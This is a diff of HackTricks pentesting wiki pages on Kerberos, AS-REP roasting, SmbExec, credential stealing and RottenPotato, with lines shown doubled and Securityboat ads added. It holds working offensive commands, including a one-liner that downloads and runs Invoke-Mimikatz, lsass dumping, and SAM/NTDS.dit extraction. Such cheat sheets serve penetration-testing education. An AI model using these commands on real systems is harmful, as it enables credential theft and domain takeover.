The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_. The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
@ -25,13 +31,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of
Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**. Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.
### Enumerating vulnerable users (need domain credentials) #### Enumerating vulnerable users (need domain credentials)
```bash ```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
``` ```
### Request AS\_REP message #### Request AS\_REP message
{% code title="Using Linux" %} {% code title="Using Linux" %}
```bash ```bash
@ -49,14 +55,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
``` ```
{% endcode %} {% endcode %}
## Cracking ### Cracking
``` ```
john --wordlist=passwords_kerb.txt hashes.asreproast john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
``` ```
## Persistence ### Persistence
Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties): Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
@ -66,6 +72,12 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) [**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -82,5 +94,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Kerberos Authentication
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/) **This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
# Kerberos (I): How does Kerberos work? Theory ## Kerberos (I): How does Kerberos work? Theory
20 - MAR - 2019 - ELOY PÉREZ 20 - MAR - 2019 - ELOY PÉREZ
@ -31,13 +37,13 @@ In this first post only basic functionality will be discussed. In later posts it
If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic. If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic.
## What is Kerberos? ### What is Kerberos?
Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access. Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.
Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources. Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.
## Kerberos items ### Kerberos items
In this section several components of Kerberos environment will be studied. In this section several components of Kerberos environment will be studied.
@ -98,7 +104,7 @@ Below is shown a summary of message sequency to perform authentication
![Kerberos messages summary](<../../.gitbook/assets/image (174).png>) ![Kerberos messages summary](<../../.gitbook/assets/image (174).png>)
## Authentication process ### Authentication process
In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service. In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.
@ -115,7 +121,7 @@ _KRB\_AS\_REQ_ has, among others, the following fields:
* The service **SPN** asociated with **krbtgt** account * The service **SPN** asociated with **krbtgt** account
* A **Nonce** generated by the user * A **Nonce** generated by the user
Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __ flag is set in user account. Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) \_\_ flag is set in user account.
**KRB\_AS\_REP** **KRB\_AS\_REP**
@ -187,7 +193,7 @@ _KRB\_AP\_REQ_ includes:
After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message. After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message.
## References ### References
* Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120) * Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120)
* \[MS-KILE] Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx) * \[MS-KILE] Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx)
@ -195,7 +201,7 @@ After that, if user privileges are rigth, this can access to service. If is the
* Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556) * Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556)
* Explain like Im 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * Explain like Im 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
* Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483) * Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483)
* Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. * Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex.
* Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris * Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris
* Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx) * Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx)
* Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0) * Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0)
@ -213,6 +219,12 @@ After that, if user privileges are rigth, this can access to service. If is the
* Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036) * Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036)
* Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58) * Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# SmbExec/ScExec
<details> <details>
@ -16,12 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# How does it works {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor. ## How does it works
# **SMBExec** **Smbexec works like Psexec.** In this example\*\*,\*\* **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
## **SMBExec**
Let's see what happens when smbexec runs by looking at it from the attackers and target's side: Let's see what happens when smbexec runs by looking at it from the attackers and target's side:
@ -33,7 +39,7 @@ So we know it creates a service "BTOBTO". But that service isn't present on the
The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"! The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"!
# Manual SMBExec ## Manual SMBExec
**Or executing commands via services** **Or executing commands via services**
@ -55,10 +61,14 @@ And then start it:
It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed. It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed.
All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -75,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Stealing Credentials
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Credentials Mimikatz {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Credentials Mimikatz
```bash ```bash
#Elevate Privileges to extract the credentials #Elevate Privileges to extract the credentials
@ -33,7 +39,7 @@ mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump
**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.** **Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
## Invoke-Mimikatz ### Invoke-Mimikatz
```bash ```bash
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
@ -43,7 +49,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa
[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** [**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
# Credentials with Meterpreter ## Credentials with Meterpreter
Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim. Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
@ -63,11 +69,11 @@ mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::sam" mimikatz_command -f "lsadump::sam"
``` ```
# Bypassing AV ## Bypassing AV
## Procdump + Mimikatz ### Procdump + Mimikatz
As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender. \ As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\
You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump. You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
{% code title="Dump lsass" %} {% code title="Dump lsass" %}
@ -93,7 +99,7 @@ This process is done automatically with [SprayKatz](https://github.com/aas-n/spr
**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.** **Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
## Dumping lsass with **comsvcs.dll** ### Dumping lsass with **comsvcs.dll**
Theres a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\ Theres a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\
The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\ The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\
@ -108,44 +114,44 @@ We just have to keep in mind that this technique can only be executed as **SYSTE
**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.** **You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
# CrackMapExec ## CrackMapExec
## Dump SAM hashes ### Dump SAM hashes
``` ```
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
``` ```
## Dump LSA secrets ### Dump LSA secrets
``` ```
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
``` ```
## Dump the NTDS.dit from target DC ### Dump the NTDS.dit from target DC
``` ```
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
``` ```
## Dump the NTDS.dit password history from target DC ### Dump the NTDS.dit password history from target DC
``` ```
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
``` ```
## Show the pwdLastSet attribute for each NTDS.dit account ### Show the pwdLastSet attribute for each NTDS.dit account
``` ```
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
``` ```
# Stealing SAM & SYSTEM ## Stealing SAM & SYSTEM
This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected. This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
## From Registry ### From Registry
The easiest way to steal those files is to get a copy from the registry: The easiest way to steal those files is to get a copy from the registry:
@ -162,11 +168,11 @@ samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL impacket-secretsdump -sam sam -security security -system system LOCAL
``` ```
## Volume Shadow Copy ### Volume Shadow Copy
You can perform copy of protected files using this service. You need to be Administrator. You can perform copy of protected files using this service. You need to be Administrator.
### Using vssadmin #### Using vssadmin
vssadmin binary is only available in Windows Server versions vssadmin binary is only available in Windows Server versions
@ -196,7 +202,7 @@ $voume.Delete();if($notrunning -eq 1){$service.Stop()}
Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html) Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
## Invoke-NinjaCopy ### Invoke-NinjaCopy
Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit. Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit.
@ -204,12 +210,12 @@ Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam" Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
``` ```
# **Active Directory Credentials - NTDS.dit** ## **Active Directory Credentials - NTDS.dit**
**The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. **The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\ The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\
__This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables: \_\_This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables:
* **Data Table**: Contains the information about the objects (users, groups...) * **Data Table**: Contains the information about the objects (users, groups...)
* **Link Table**: Information about the relations (member of...) * **Link Table**: Information about the relations (member of...)
@ -217,9 +223,9 @@ __This file is a database _Extensible Storage Engine_ (ESE) and is "officially"
More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/) More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the **_**lsass**_** memory** (you can find the lastet accessed data probably because of the performance impruve by using a **cache**). Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the \_lsass**\_\*\* memory\*\* (you can find the lastet accessed data probably because of the performance impruve by using a **cache**).
### Decrypting the hashes inside NTDS.dit #### Decrypting the hashes inside NTDS.dit
The hash is cyphered 3 times: The hash is cyphered 3 times:
@ -229,7 +235,7 @@ The hash is cyphered 3 times:
**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_). **PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
## Copying NTDS.dit using Ntdsutil ### Copying NTDS.dit using Ntdsutil
Available since Windows Server 2008. Available since Windows Server 2008.
@ -239,7 +245,7 @@ ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick). You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
## **Extracting hashes from NTDS.dit** ### **Extracting hashes from NTDS.dit**
Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**: Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
@ -257,7 +263,7 @@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](ht
Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject`
# Lazagne ## Lazagne
Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software. Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software.
@ -265,13 +271,13 @@ Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases)
lazagne.exe all lazagne.exe all
``` ```
# Other tools for extracting credentials from SAM and LSASS ## Other tools for extracting credentials from SAM and LSASS
## Windows credentials Editor (WCE) ### Windows credentials Editor (WCE)
This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/) This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
## fgdump ### fgdump
Extract credentials from the SAM file Extract credentials from the SAM file
@ -280,7 +286,7 @@ You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe fgdump.exe
``` ```
## PwDump ### PwDump
Extract credentials from the SAM file Extract credentials from the SAM file
@ -290,14 +296,20 @@ PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump type outpwdump
``` ```
## PwDump7 ### PwDump7
Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted. Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted.
# Defenses ## Defenses
[**Learn about some credentials protections here.**](credentials-protections.md) [**Learn about some credentials protections here.**](credentials-protections.md)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -314,5 +326,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# RottenPotato
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/) The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)
Service accounts usually have special privileges \(SeImpersonatePrivileges\) and this could be used to escalate privileges. Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
@ -27,7 +33,7 @@ I wont go into the details on how this exploit works, the article above expla
Lets check our privileges with meterpreter: Lets check our privileges with meterpreter:
```text ```
meterpreter > getprivs meterpreter > getprivs
Enabled Process Privileges Enabled Process Privileges
@ -47,7 +53,7 @@ Excellent, it looks like we have the privileges we need to perform the attack. L
Back on our meterpreter session we load the `incognito` extension. Back on our meterpreter session we load the `incognito` extension.
```text ```
meterpreter > use incognito meterpreter > use incognito
Loading extension incognito...Success. Loading extension incognito...Success.
meterpreter > list_tokens -u meterpreter > list_tokens -u
@ -67,7 +73,7 @@ No tokens available
We can see we currently have no Impersonation Tokens. Lets run the Rotten Potato exploit. We can see we currently have no Impersonation Tokens. Lets run the Rotten Potato exploit.
```text ```
meterpreter > execute -f rottenpotato.exe -Hc meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created. Process 3104 created.
Channel 2 created. Channel 2 created.
